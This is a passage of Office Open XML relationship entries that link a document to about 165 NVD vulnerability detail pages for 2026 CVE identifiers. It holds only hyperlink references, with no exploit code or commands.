Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81380" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86080" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86714" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86719" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86737" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11891" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12387" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33387" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33920" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73318" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79904" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86735" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86085" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86993" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78971" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0001" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28627" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45527" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53638" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79588" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79603" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86736" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86853" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86994" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86995" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12285" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49895" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75726" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0054" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28630" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28660" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45519" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45525" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55290" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86564" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86670" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82710" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86515" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86518" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86675" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16003" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86644" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86667" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45219" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45220" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49153" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49154" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49155" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49156" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70613" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70614" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7809" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82514" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1621" /><Relationship 